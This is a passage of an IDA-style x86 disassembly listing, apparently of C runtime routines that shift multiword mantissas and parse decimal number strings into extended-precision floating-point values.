add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_4121D7
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_4121D7: ; CODE XREF: sub_411EAB+325�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_4121F2: ; CODE XREF: sub_411EAB+372�j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_4121F2
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_41222C: ; CODE XREF: sub_411EAB+398�j
cmp edx, eax
jl short loc_412238
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_41223D
; ---------------------------------------------------------------------------
loc_412238: ; CODE XREF: sub_411EAB+383�j
and [ebp+edx*4+var_20], 0
loc_41223D: ; CODE XREF: sub_411EAB+38B�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_41222C
loc_412245: ; CODE XREF: sub_411EAB+188�j
push 2
xor ebx, ebx
pop eax
jmp loc_4123A9
; ---------------------------------------------------------------------------
loc_41224F: ; CODE XREF: sub_411EAB+18F�j
cmp ebx, dword_424248
mov ecx, dword_424254
jl loc_41230E
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
stosd
or [ebp+var_20], 80000000h
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_41228A
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_41228A: ; CODE XREF: sub_411EAB+3D8�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_4122A5: ; CODE XREF: sub_411EAB+425�j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_4122A5
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_4122DF: ; CODE XREF: sub_411EAB+44B�j
cmp edx, eax
jl short loc_4122EB
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_4122F0
; ---------------------------------------------------------------------------
loc_4122EB: ; CODE XREF: sub_411EAB+436�j
and [ebp+edx*4+var_20], 0
loc_4122F0: ; CODE XREF: sub_411EAB+43E�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_4122DF
mov eax, dword_424248
mov ecx, dword_42425C
lea ebx, [ecx+eax]
xor eax, eax
inc eax
jmp loc_4123A9
; ---------------------------------------------------------------------------
loc_41230E: ; CODE XREF: sub_411EAB+3B0�j
mov eax, dword_42425C
and [ebp+var_20], 7FFFFFFFh
add ebx, eax
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_412336
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_412336: ; CODE XREF: sub_411EAB+484�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or esi, 0FFFFFFFFh
mov ecx, edx
shl esi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not esi
loc_412351: ; CODE XREF: sub_411EAB+4D4�j
mov ecx, [ebp+arg_0]
mov edi, [ebp+ecx*4+var_20]
mov ecx, edi
and ecx, esi
mov [ebp+var_10], ecx
mov ecx, edx
shr edi, cl
mov ecx, [ebp+arg_0]
or edi, [ebp+var_C]
mov [ebp+ecx*4+var_20], edi
mov edi, [ebp+var_10]
mov ecx, [ebp+var_4]
shl edi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], edi
jl short loc_412351
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_41238E: ; CODE XREF: sub_411EAB+4FA�j
cmp edx, eax
jl short loc_41239A
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_41239F
; ---------------------------------------------------------------------------
loc_41239A: ; CODE XREF: sub_411EAB+4E5�j
and [ebp+edx*4+var_20], 0
loc_41239F: ; CODE XREF: sub_411EAB+4ED�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_41238E
xor eax, eax
loc_4123A9: ; CODE XREF: sub_411EAB+39F�j
; sub_411EAB+45E�j
pop esi
loc_4123AA: ; CODE XREF: sub_411EAB+55�j
; sub_411EAB+65�j
push 1Fh
pop ecx
sub ecx, dword_424254
shl ebx, cl
mov ecx, [ebp+var_14]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or ebx, ecx
mov ecx, dword_424258
or ebx, [ebp+var_20]
cmp ecx, 40h
jnz short loc_4123DF
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_1C]
mov [ecx+4], ebx
mov [ecx], edx
jmp short loc_4123E9
; ---------------------------------------------------------------------------
loc_4123DF: ; CODE XREF: sub_411EAB+525�j
cmp ecx, 20h
jnz short loc_4123E9
mov ecx, [ebp+arg_4]
mov [ecx], ebx
loc_4123E9: ; CODE XREF: sub_411EAB+532�j
; sub_411EAB+537�j
pop edi
pop ebx
leave
retn
sub_411EAB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4123ED proc near ; CODE XREF: sub_4114AD+37�p
; sub_411553+37�p
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_46 = dword ptr -46h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_32 = dword ptr -32h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_9 = byte ptr -9
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 7Ch
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
xor ebx, ebx
push esi
xor esi, esi
mov [ebp+var_7C], eax
mov eax, [ebp+arg_4]
inc esi
xor ecx, ecx
cmp [ebp+arg_1C], ebx
push edi
mov [ebp+var_70], eax
lea edi, [ebp+var_20]
mov [ebp+var_74], ebx
mov [ebp+var_68], esi
mov [ebp+var_4C], ebx
mov [ebp+var_58], ebx
mov [ebp+var_5C], ebx
mov [ebp+var_60], ebx
mov [ebp+var_64], ebx
mov [ebp+var_50], ebx
mov [ebp+var_6C], ebx
jnz short loc_412455
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
xor eax, eax
jmp loc_412A6F
; ---------------------------------------------------------------------------
loc_412455: ; CODE XREF: sub_4123ED+47�j
mov edx, [ebp+arg_8]
mov [ebp+var_54], edx
loc_41245B: ; CODE XREF: sub_4123ED+81�j
mov al, [edx]
cmp al, 20h
jz short loc_41246D
cmp al, 9
jz short loc_41246D
cmp al, 0Ah
jz short loc_41246D
cmp al, 0Dh
jnz short loc_412470
loc_41246D: ; CODE XREF: sub_4123ED+72�j
; sub_4123ED+76�j ...
inc edx
jmp short loc_41245B
; ---------------------------------------------------------------------------
loc_412470: ; CODE XREF: sub_4123ED+7E�j
mov bl, 30h
loc_412472: ; CODE XREF: sub_4123ED+A6�j
; sub_4123ED+BC�j ...
mov al, [edx]
inc edx
cmp ecx, 0Bh ; switch 12 cases
ja loc_4126AD ; default
; jumptable 0041247E case 10
jmp ds:off_412A81[ecx*4] ; switch jump
loc_412485: ; DATA XREF: .text:off_412A81�o
mov cl, al ; jumptable 0041247E case 0
sub cl, 31h
cmp cl, 8
ja short loc_412495
loc_41248F: ; CODE XREF: sub_4123ED+F7�j
; sub_4123ED+14A�j
push 3
loc_412491: ; CODE XREF: sub_4123ED+201�j
; sub_4123ED+218�j
pop ecx
dec edx
jmp short loc_412472
; ---------------------------------------------------------------------------
loc_412495: ; CODE XREF: sub_4123ED+A0�j
mov ecx, [ebp+arg_1C]
mov ecx, [ecx]
mov ecx, [ecx+0BCh]
mov ecx, [ecx]
cmp al, [ecx]
jnz short loc_4124AB
loc_4124A6: ; CODE XREF: sub_4123ED+15F�j
push 5
loc_4124A8: ; CODE XREF: sub_4123ED+10C�j
; sub_4123ED+138�j ...
pop ecx
jmp short loc_412472
; ---------------------------------------------------------------------------
loc_4124AB: ; CODE XREF: sub_4123ED+B7�j
movsx eax, al
sub eax, 2Bh
jz short loc_4124D0
dec eax
dec eax
jz short loc_4124C4
sub eax, 3
jnz loc_41264B
loc_4124C0: ; CODE XREF: sub_4123ED+118�j
; sub_4123ED+167�j
mov ecx, esi
jmp short loc_412472
; ---------------------------------------------------------------------------
loc_4124C4: ; CODE XREF: sub_4123ED+C8�j
push 2
pop ecx
mov [ebp+var_74], 8000h
jmp short loc_412472
; ---------------------------------------------------------------------------
loc_4124D0: ; CODE XREF: sub_4123ED+C4�j
and [ebp+var_74], 0
push 2
pop ecx
jmp short loc_412472
; ---------------------------------------------------------------------------
loc_4124D9: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: .text:off_412A81�o
mov cl, al ; jumptable 0041247E case 1
sub cl, 31h
cmp cl, 8
mov [ebp+var_58], esi
jbe short loc_41248F
mov ecx, [ebp+arg_1C]
mov ecx, [ecx]
mov ecx, [ecx+0BCh]
mov ecx, [ecx]
cmp al, [ecx]
jnz short loc_4124FB
loc_4124F7: ; CODE XREF: sub_4123ED+1A7�j
push 4
jmp short loc_4124A8
; ---------------------------------------------------------------------------
loc_4124FB: ; CODE XREF: sub_4123ED+108�j
cmp al, 2Bh
jz short loc_412527
cmp al, 2Dh
jz short loc_412527
cmp al, bl
jz short loc_4124C0
loc_412507: ; CODE XREF: sub_4123ED+1B5�j
cmp al, 43h
jle loc_41264B
cmp al, 45h
jle short loc_412523
cmp al, 63h
jle loc_41264B
cmp al, 65h
jg loc_41264B
loc_412523: ; CODE XREF: sub_4123ED+124�j
push 6
jmp short loc_4124A8
; ---------------------------------------------------------------------------
loc_412527: ; CODE XREF: sub_4123ED+110�j
; sub_4123ED+114�j ...
dec edx
push 0Bh
jmp loc_4124A8
; ---------------------------------------------------------------------------
loc_41252F: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: .text:off_412A81�o
mov cl, al ; jumptable 0041247E case 2
sub cl, 31h
cmp cl, 8
jbe loc_41248F
mov ecx, [ebp+arg_1C]
mov ecx, [ecx]
mov ecx, [ecx+0BCh]
mov ecx, [ecx]
cmp al, [ecx]
jz loc_4124A6
cmp al, bl
jz loc_4124C0
loc_41255A: ; CODE XREF: sub_4123ED+1F9�j
; sub_4123ED:loc_412619�j
mov edx, [ebp+var_54]
jmp loc_412676
; ---------------------------------------------------------------------------
loc_412562: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: .text:off_412A81�o
mov [ebp+var_58], esi ; jumptable 0041247E case 3
jmp short loc_412581
; ---------------------------------------------------------------------------
loc_412567: ; CODE XREF: sub_4123ED+196�j
cmp al, 39h
jg short loc_412585
cmp [ebp+var_4C], 19h
jnb short loc_41257B
inc [ebp+var_4C]
sub al, bl
mov [edi], al
inc edi
jmp short loc_41257E
; ---------------------------------------------------------------------------
loc_41257B: ; CODE XREF: sub_4123ED+182�j
inc [ebp+var_50]
loc_41257E: ; CODE XREF: sub_4123ED+18C�j
mov al, [edx]
inc edx
loc_412581: ; CODE XREF: sub_4123ED+178�j
cmp al, bl
jge short loc_412567
loc_412585: ; CODE XREF: sub_4123ED+17C�j
mov ecx, [ebp+arg_1C]
mov ecx, [ecx]
mov ecx, [ecx+0BCh]
mov ecx, [ecx]
cmp al, [ecx]
jz loc_4124F7
loc_41259A: ; CODE XREF: sub_4123ED+1D6�j
; sub_4123ED+1F0�j
cmp al, 2Bh
jz short loc_412527
cmp al, 2Dh
jz short loc_412527
jmp loc_412507
; ---------------------------------------------------------------------------
loc_4125A7: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: .text:off_412A81�o
cmp [ebp+var_4C], 0 ; jumptable 0041247E case 4
mov [ebp+var_58], esi
mov [ebp+var_5C], esi
jnz short loc_4125D9
jmp short loc_4125BB
; ---------------------------------------------------------------------------
loc_4125B5: ; CODE XREF: sub_4123ED+1D0�j
dec [ebp+var_50]
mov al, [edx]
inc edx
loc_4125BB: ; CODE XREF: sub_4123ED+1C6�j
cmp al, bl
jz short loc_4125B5
jmp short loc_4125D9
; ---------------------------------------------------------------------------
loc_4125C1: ; CODE XREF: sub_4123ED+1EE�j
cmp al, 39h
jg short loc_41259A
cmp [ebp+var_4C], 19h
jnb short loc_4125D6
inc [ebp+var_4C]
sub al, bl
mov [edi], al
inc edi
dec [ebp+var_50]
loc_4125D6: ; CODE XREF: sub_4123ED+1DC�j
mov al, [edx]
inc edx
loc_4125D9: ; CODE XREF: sub_4123ED+1C4�j
; sub_4123ED+1D2�j
cmp al, bl
jge short loc_4125C1
jmp short loc_41259A
; ---------------------------------------------------------------------------
loc_4125DF: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: .text:off_412A81�o
sub al, bl ; jumptable 0041247E case 5
cmp al, 9
mov [ebp+var_5C], esi
ja loc_41255A
push 4
jmp loc_412491
; ---------------------------------------------------------------------------
loc_4125F3: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: .text:off_412A81�o
lea ecx, [edx-2] ; jumptable 0041247E case 6
mov [ebp+var_54], ecx
mov cl, al
sub cl, 31h
cmp cl, 8
ja short loc_41260A
loc_412603: ; CODE XREF: sub_4123ED+25C�j
; sub_4123ED+269�j
push 9
jmp loc_412491
; ---------------------------------------------------------------------------
loc_41260A: ; CODE XREF: sub_4123ED+214�j
movsx eax, al
sub eax, 2Bh
jz short loc_412632
dec eax
dec eax
jz short loc_412626
sub eax, 3
loc_412619: ; CODE XREF: sub_4123ED+26D�j
jnz loc_41255A
push 8
jmp loc_4124A8
; ---------------------------------------------------------------------------
loc_412626: ; CODE XREF: sub_4123ED+227�j
; sub_4123ED+285�j
or [ebp+var_68], 0FFFFFFFFh
push 7
pop ecx
jmp loc_412472
; ---------------------------------------------------------------------------
loc_412632: ; CODE XREF: sub_4123ED+223�j
; sub_4123ED+281�j
push 7
jmp loc_4124A8
; ---------------------------------------------------------------------------
loc_412639: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: .text:off_412A81�o
mov [ebp+var_60], esi ; jumptable 0041247E case 8
jmp short loc_412641
; ---------------------------------------------------------------------------
loc_41263E: ; CODE XREF: sub_4123ED+256�j
mov al, [edx]
inc edx
loc_412641: ; CODE XREF: sub_4123ED+24F�j
cmp al, bl
jz short loc_41263E
sub al, 31h
cmp al, 8
jbe short loc_412603
loc_41264B: ; CODE XREF: sub_4123ED+CD�j
; sub_4123ED+11C�j ...
dec edx
jmp short loc_412676
; ---------------------------------------------------------------------------
loc_41264E: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: .text:off_412A81�o
mov cl, al ; jumptable 0041247E case 7
sub cl, 31h
cmp cl, 8
jbe short loc_412603
cmp al, bl
jmp short loc_412619
; ---------------------------------------------------------------------------
loc_41265C: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: .text:off_412A81�o
cmp [ebp+arg_18], 0 ; jumptable 0041247E case 11
jz short loc_4126A9
movsx eax, al
sub eax, 2Bh
lea ecx, [edx-1]
mov [ebp+var_54], ecx
jz short loc_412632
dec eax
dec eax
jz short loc_412626
mov edx, ecx
loc_412676: ; CODE XREF: sub_4123ED+170�j
; sub_4123ED+25F�j ...
cmp [ebp+var_58], 0
mov eax, [ebp+var_70]
mov [eax], edx
jz loc_412A2A
push 18h
pop eax
cmp [ebp+var_4C], eax
jbe short loc_41269D
cmp [ebp+var_9], 5
jl short loc_412696
inc [ebp+var_9]
loc_412696: ; CODE XREF: sub_4123ED+2A4�j
dec edi
inc [ebp+var_50]
mov [ebp+var_4C], eax
loc_41269D: ; CODE XREF: sub_4123ED+29E�j
cmp [ebp+var_4C], 0
jbe loc_412A51
jmp short loc_412702
; ---------------------------------------------------------------------------
loc_4126A9: ; CODE XREF: sub_4123ED+273�j
push 0Ah
pop ecx
dec edx
loc_4126AD: ; CODE XREF: sub_4123ED+8B�j
; sub_4123ED+91�j
; DATA XREF: ...
cmp ecx, 0Ah ; default
; jumptable 0041247E case 10
jnz loc_412472
jmp short loc_412676
; ---------------------------------------------------------------------------
loc_4126B8: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: .text:off_412A81�o
mov [ebp+var_60], esi ; jumptable 0041247E case 9
xor ecx, ecx
jmp short loc_4126D8
; ---------------------------------------------------------------------------
loc_4126BF: ; CODE XREF: sub_4123ED+2ED�j
cmp al, 39h
jg short loc_4126E3
imul ecx, 0Ah
movsx esi, al
lea ecx, [ecx+esi-30h]
cmp ecx, 1450h
jg short loc_4126DE
mov al, [edx]
inc edx
loc_4126D8: ; CODE XREF: sub_4123ED+2D0�j
cmp al, bl
jge short loc_4126BF
jmp short loc_4126E3
; ---------------------------------------------------------------------------
loc_4126DE: ; CODE XREF: sub_4123ED+2E6�j
mov ecx, 1451h
loc_4126E3: ; CODE XREF: sub_4123ED+2D4�j
; sub_4123ED+2EF�j
mov [ebp+var_64], ecx
jmp short loc_4126F3
; ---------------------------------------------------------------------------
loc_4126E8: ; CODE XREF: sub_4123ED+308�j
cmp al, 39h
jg loc_41264B
mov al, [edx]
inc edx
loc_4126F3: ; CODE XREF: sub_4123ED+2F9�j
cmp al, bl
jge short loc_4126E8
jmp loc_41264B
; ---------------------------------------------------------------------------
loc_4126FC: ; CODE XREF: sub_4123ED+319�j
dec [ebp+var_4C]
inc [ebp+var_50]
loc_412702: ; CODE XREF: sub_4123ED+2BA�j
dec edi
cmp byte ptr [edi], 0
jz short loc_4126FC
lea eax, [ebp+var_3C]
push eax
push [ebp+var_4C]
lea eax, [ebp+var_20]
push eax
call sub_4137AA
mov eax, [ebp+var_64]
xor ecx, ecx
add esp, 0Ch
cmp [ebp+var_68], ecx
jge short loc_412727
neg eax
loc_412727: ; CODE XREF: sub_4123ED+336�j
add eax, [ebp+var_50]
cmp [ebp+var_60], ecx
jnz short loc_412732
add eax, [ebp+arg_10]
loc_412732: ; CODE XREF: sub_4123ED+340�j
cmp [ebp+var_5C], ecx
jnz short loc_41273A
sub eax, [ebp+arg_14]
loc_41273A: ; CODE XREF: sub_4123ED+348�j
cmp eax, 1450h
jg loc_412A33
cmp eax, 0FFFFEBB0h
jl loc_412A4A
mov esi, offset dword_424260
sub esi, 60h
cmp eax, ecx
mov [ebp+var_54], eax
jz loc_412A18
jge short loc_412772
neg eax
mov esi, offset dword_4243C0
mov [ebp+var_54], eax
sub esi, 60h
loc_412772: ; CODE XREF: sub_4123ED+376�j
cmp [ebp+arg_C], ecx
jnz short loc_41277B
mov word ptr [ebp+var_3C], cx
loc_41277B: ; CODE XREF: sub_4123ED+388�j
cmp [ebp+var_54], ecx
jz loc_412A18
loc_412784: ; CODE XREF: sub_4123ED+625�j
mov eax, [ebp+var_54]
sar [ebp+var_54], 3
add esi, 54h
and eax, 7
test eax, eax
mov [ebp+var_4C], esi
jz loc_412A0E
imul eax, 0Ch
add eax, esi
mov ebx, eax
cmp word ptr [ebx], 8000h
mov [ebp+var_70], ebx
jb short loc_4127C1
mov esi, ebx
lea edi, [ebp+var_48]
movsd
movsd
movsd
dec [ebp+var_46]
mov esi, [ebp+var_4C]
lea ebx, [ebp+var_48]
mov [ebp+var_70], ebx
loc_4127C1: ; CODE XREF: sub_4123ED+3BE�j
movzx edx, word ptr [ebx+0Ah]
mov ecx, [ebp+var_32]
xor eax, eax
mov [ebp+var_50], eax
mov [ebp+var_2C], eax
mov [ebp+var_28], eax
mov [ebp+var_24], eax
mov eax, edx
mov edi, 7FFFh
xor eax, ecx
and ecx, edi
and edx, edi
and eax, 8000h
cmp cx, 7FFFh
lea edi, [edx+ecx]
movzx edi, di
jnb loc_4129F4
cmp dx, 7FFFh
jnb loc_4129F4
cmp di, 0BFFDh
ja loc_4129F4
cmp di, 3FBFh
ja short loc_412823
xor eax, eax
mov [ebp+var_38], eax
mov [ebp+var_3C], eax
jmp loc_412A0B
; ---------------------------------------------------------------------------
loc_412823: ; CODE XREF: sub_4123ED+427�j
test cx, cx
jnz short loc_412847
inc edi
test dword ptr [ebp-34h], 7FFFFFFFh
jnz short loc_412847
cmp [ebp+var_38], 0
jnz short loc_412847
cmp [ebp+var_3C], 0
jnz short loc_412847
and word ptr [ebp+var_32], cx
jmp loc_412A0E
; ---------------------------------------------------------------------------
loc_412847: ; CODE XREF: sub_4123ED+439�j
; sub_4123ED+443�j ...
xor ecx, ecx
cmp dx, cx
jnz short loc_41286F
inc edi
test dword ptr [ebx+8], 7FFFFFFFh
jnz short loc_41286F
cmp [ebx+4], ecx
jnz short loc_41286F
cmp [ebx], ecx
jnz short loc_41286F
mov [ebp-34h], ecx
mov [ebp+var_38], ecx
mov [ebp+var_3C], ecx
jmp loc_412A0E
; ---------------------------------------------------------------------------
loc_41286F: ; CODE XREF: sub_4123ED+45F�j
; sub_4123ED+469�j ...
and [ebp+var_68], ecx
lea esi, [ebp+var_28]
mov [ebp+var_58], 5
loc_41287C: ; CODE XREF: sub_4123ED+4FF�j
mov ecx, [ebp+var_68]
mov edx, [ebp+var_58]
add ecx, ecx
test edx, edx
mov [ebp+var_64], edx
jle short loc_4128E0
lea ecx, [ebp+ecx+var_3C]
add ebx, 8
mov [ebp+var_5C], ecx
mov [ebp+var_60], ebx
loc_412898: ; CODE XREF: sub_4123ED+4EE�j
mov ecx, [ebp+var_60]
mov edx, [ebp+var_5C]
movzx edx, word ptr [edx]
movzx ecx, word ptr [ecx]
and [ebp+var_78], 0
imul ecx, edx
mov edx, [esi-4]
lea ebx, [edx+ecx]
cmp ebx, edx
jb short loc_4128B9
cmp ebx, ecx
jnb short loc_4128C0
loc_4128B9: ; CODE XREF: sub_4123ED+4C6�j
mov [ebp+var_78], 1
loc_4128C0: ; CODE XREF: sub_4123ED+4CA�j
cmp [ebp+var_78], 0
mov [esi-4], ebx
jz short loc_4128CC
inc word ptr [esi]
loc_4128CC: ; CODE XREF: sub_4123ED+4DA�j
add [ebp+var_5C], 2
sub [ebp+var_60], 2
dec [ebp+var_64]
cmp [ebp+var_64], 0
jg short loc_412898
mov ebx, [ebp+var_70]
loc_4128E0: ; CODE XREF: sub_4123ED+49C�j
inc esi
inc esi
inc [ebp+var_68]
dec [ebp+var_58]
cmp [ebp+var_58], 0
jg short loc_41287C
add edi, 0C002h
test di, di
jle short loc_412934
loc_4128F9: ; CODE XREF: sub_4123ED+540�j
test [ebp+var_24], 80000000h
jnz short loc_41292F
mov esi, [ebp+var_28]
mov ecx, [ebp+var_2C]
shl [ebp+var_2C], 1
shr ecx, 1Fh
mov edx, esi
add esi, esi
or esi, ecx
mov ecx, [ebp+var_24]
shr edx, 1Fh
add ecx, ecx
or ecx, edx
add edi, 0FFFFh
test di, di
mov [ebp+var_28], esi
mov [ebp+var_24], ecx
jg short loc_4128F9
loc_41292F: ; CODE XREF: sub_4123ED+513�j
test di, di
jg short loc_412982
loc_412934: ; CODE XREF: sub_4123ED+50A�j
add edi, 0FFFFh
test di, di
jge short loc_412982
mov ecx, edi
neg ecx
movzx esi, cx
add edi, esi
loc_412948: ; CODE XREF: sub_4123ED+588�j
test byte ptr [ebp+var_2C], 1
jz short loc_412951
inc [ebp+var_50]
loc_412951: ; CODE XREF: sub_4123ED+55F�j
mov ecx, [ebp+var_24]
mov ebx, [ebp+var_28]
mov edx, [ebp+var_28]
shr [ebp+var_24], 1
shl ecx, 1Fh
shr ebx, 1
or ebx, ecx
mov ecx, [ebp+var_2C]
shl edx, 1Fh
shr ecx, 1
or ecx, edx
dec esi
mov [ebp+var_28], ebx
mov [ebp+var_2C], ecx
jnz short loc_412948
cmp [ebp+var_50], 0
jz short loc_412982
or word ptr [ebp+var_2C], 1
loc_412982: ; CODE XREF: sub_4123ED+545�j
; sub_4123ED+550�j ...
cmp word ptr [ebp+var_2C], 8000h
ja short loc_41299B
mov ecx, [ebp+var_2C]
and ecx, 1FFFFh
cmp ecx, 18000h
jnz short loc_4129CE
loc_41299B: ; CODE XREF: sub_4123ED+59B�j
cmp [ebp+var_2C+2], 0FFFFFFFFh
jnz short loc_4129CB
and [ebp+var_2C+2], 0
cmp [ebp+var_28+2], 0FFFFFFFFh
jnz short loc_4129C6
and [ebp+var_28+2], 0
cmp word ptr [ebp+var_24+2], 0FFFFh
jnz short loc_4129C0
mov word ptr [ebp+var_24+2], 8000h
inc edi
jmp short loc_4129CE
; ---------------------------------------------------------------------------
loc_4129C0: ; CODE XREF: sub_4123ED+5C8�j
inc word ptr [ebp+var_24+2]
jmp short loc_4129CE
; ---------------------------------------------------------------------------
loc_4129C6: ; CODE XREF: sub_4123ED+5BC�j
inc [ebp+var_28+2]
jmp short loc_4129CE
; ---------------------------------------------------------------------------
loc_4129CB: ; CODE XREF: sub_4123ED+5B2�j
inc [ebp+var_2C+2]
loc_4129CE: ; CODE XREF: sub_4123ED+5AC�j
; sub_4123ED+5D1�j ...
cmp di, 7FFFh
mov esi, [ebp+var_4C]
jnb short loc_4129F4
mov cx, word ptr [ebp+var_2C+2]
mov word ptr [ebp+var_3C], cx
mov ecx, [ebp+var_28]
mov [ebp+var_3C+2], ecx
mov ecx, [ebp+var_24]
or edi, eax
mov [ebp+var_38+2], ecx
mov word ptr [ebp+var_32], di
jmp short loc_412A0E
; ---------------------------------------------------------------------------
loc_4129F4: ; CODE XREF: sub_4123ED+406�j
; sub_4123ED+411�j ...
neg ax
sbb eax, eax
and [ebp+var_38], 0
and eax, 80000000h
add eax, 7FFF8000h
and [ebp+var_3C], 0
loc_412A0B: ; CODE XREF: sub_4123ED+431�j
mov [ebp-34h], eax
loc_412A0E: ; CODE XREF: sub_4123ED+3A9�j
; sub_4123ED+455�j ...
cmp [ebp+var_54], 0
jnz loc_412784
loc_412A18: ; CODE XREF: sub_4123ED+370�j
; sub_4123ED+391�j
mov eax, [ebp-34h]
movzx ecx, word ptr [ebp+var_3C]
mov esi, [ebp+var_3C+2]
mov edx, [ebp+var_38+2]
shr eax, 10h
jmp short loc_412A59
; ---------------------------------------------------------------------------
loc_412A2A: ; CODE XREF: sub_4123ED+292�j
mov [ebp+var_6C], 4
jmp short loc_412A51
; ---------------------------------------------------------------------------
loc_412A33: ; CODE XREF: sub_4123ED+352�j
xor esi, esi
mov eax, 7FFFh
mov edx, 80000000h
xor ecx, ecx
mov [ebp+var_6C], 2
jmp short loc_412A59
; ---------------------------------------------------------------------------
loc_412A4A: ; CODE XREF: sub_4123ED+35D�j
mov [ebp+var_6C], 1
loc_412A51: ; CODE XREF: sub_4123ED+2B4�j
; sub_4123ED+644�j
xor ecx, ecx
xor eax, eax
xor edx, edx
xor esi, esi
loc_412A59: ; CODE XREF: sub_4123ED+63B�j
; sub_4123ED+65B�j
mov edi, [ebp+var_7C]
or eax, [ebp+var_74]
mov [edi], cx
mov [edi+0Ah], ax
mov eax, [ebp+var_6C]
mov [edi+2], esi
mov [edi+6], edx
loc_412A6F: ; CODE XREF: sub_4123ED+63�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_4123ED endp
; ---------------------------------------------------------------------------
db 8Dh, 49h, 0
off_412A81 dd offset loc_412485 ; DATA XREF: sub_4123ED+91�r
dd offset loc_4124D9 ; jump table for switch statement
dd offset loc_41252F
dd offset loc_412562
dd offset loc_4125A7
dd offset loc_4125DF
dd offset loc_4125F3
dd offset loc_41264E
dd offset loc_412639
dd offset loc_4126B8
dd offset loc_4126AD
dd offset loc_41265C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412AB1 proc near ; CODE XREF: sub_411771+3F�p
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1A = dword ptr -1Ah
var_16 = dword ptr -16h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
